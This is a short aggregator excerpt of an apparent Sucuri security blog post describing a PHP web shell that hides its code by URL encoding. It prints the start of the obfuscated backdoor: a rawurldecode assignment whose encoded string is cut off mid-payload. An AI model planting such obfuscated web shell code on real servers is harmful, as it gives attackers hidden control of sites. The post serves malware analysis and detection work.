Backdoor Obfuscation: tempnam & URL Encoding

Backdoor Obfuscation: tempnam & URL Encoding

In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code.

During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host.

This PHP web shell uses the following obfuscation method, where the web shell code is stored in URL encoded format and assigned to the variable $i:

<?php
$i = rawurldecode(“%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm

Continue reading Backdoor Obfuscation: tempnam & URL Encoding at Sucuri Blog.

Read more: Backdoor Obfuscation: tempnam & URL Encoding

Story added 28. September 2020, content source with full text you can find at link above.